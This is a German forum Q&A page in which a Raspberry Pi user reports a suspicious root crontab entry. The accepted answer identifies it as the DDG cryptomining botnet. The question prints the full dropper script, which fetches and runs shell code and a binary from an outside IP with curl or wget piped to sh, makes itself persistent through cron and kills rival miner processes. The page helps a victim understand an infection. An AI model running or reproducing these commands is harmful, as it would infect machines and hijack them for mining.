GNU/Linux >> LINUX-Kenntnisse >  >> Linux

Verdächtiger Crontab-Eintrag, der alle 15 Minuten „xribfa4“ ausführt?

Ich wollte etwas zu meiner Root-Crontab-Datei auf meinem Raspberry Pi hinzufügen und habe einen Eintrag gefunden, der mir verdächtig vorkommt. Die Suche nach Teilen davon bei Google hat nichts ergeben.

Crontab-Eintrag:

*/15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -m180 -fsSL http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh

Der Inhalt von http://103.219.112.66:8000/i.sh sind:

export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin

mkdir -p /var/spool/cron/crontabs
echo "" > /var/spool/cron/root
echo "*/15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -fsSL -m180 http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh" >> /var/spool/cron/root
cp -f /var/spool/cron/root /var/spool/cron/crontabs/root

cd /tmp
touch /usr/local/bin/writeable && cd /usr/local/bin/
touch /usr/libexec/writeable && cd /usr/libexec/
touch /usr/bin/writeable && cd /usr/bin/
rm -rf /usr/local/bin/writeable /usr/libexec/writeable /usr/bin/writeable

export PATH=$PATH:$(pwd)
ps auxf | grep -v grep | grep xribfa4 || rm -rf xribfa4
if [ ! -f "xribfa4" ]; then
    curl -fsSL -m1800 http://103.219.112.66:8000/static/4004/ddgs.$(uname -m) -o xribfa4||wget -q -T1800 http://103.219.112.66:8000/static/4004/ddgs.$(uname -m) -O xribfa4
fi
chmod +x xribfa4
/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4

ps auxf | grep -v grep | grep xribbcb | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribbcc | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribbcd | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribbce | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribfa0 | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribfa1 | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribfa2 | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribfa3 | awk '{print $2}' | xargs kill -9

echo "*/15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -m180 -fsSL http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh" | crontab -

Meine Linux-Kenntnisse sind begrenzt, aber für mich scheint es nicht üblich zu sein, Binärdateien von einem indonesischen Server herunterzuladen und sie regelmäßig als root auszuführen.

Was ist das? Was soll ich tun?

Akzeptierte Antwort:

Es ist ein DDG-Mining-Botnet, wie es funktioniert:

  1. Ausnutzen einer RCE-Schwachstelle
  2. Änderung der Crontab
  3. herunterladen des entsprechenden Mining-Programms (geschrieben mit go)
  4. Starten des Mining-Prozesses

DDG:Ein Mining-Botnetz, das auf Datenbankserver abzielt

SystemdMiner, wenn ein Botnet die Infrastruktur eines anderen Botnets ausleiht

U&L :Wie kann ich Minerd-Malware auf einer AWS EC2-Instance töten? (kompromittierter Server)


Linux
  1. Ausführen eines Befehls für jede Zeile in einer Textdatei

  2. Überprüfen, ob ein Skript ausgeführt wird?

  3. Wie bekomme ich das Tty, in dem Bash läuft?

  4. Ausführen eines Cron-Jobs unter Linux alle sechs Stunden

  5. So führen Sie den Crontab-Job jede Woche am Sonntag aus

Cron-Jobs alle 5, 10 oder 15 Minuten ausführen

17 Linux-Befehle, die jeder Systemadministrator kennen sollte

So führen Sie jede Woche am Sonntag einen Crontab-Job aus

HDDTemp crontab jede Stunde in die Datei

Crontab-Beispiel – alle 5 Minuten

Wie würde ich einen Cron-Job dazu bringen, alle 30 Minuten ausgeführt zu werden?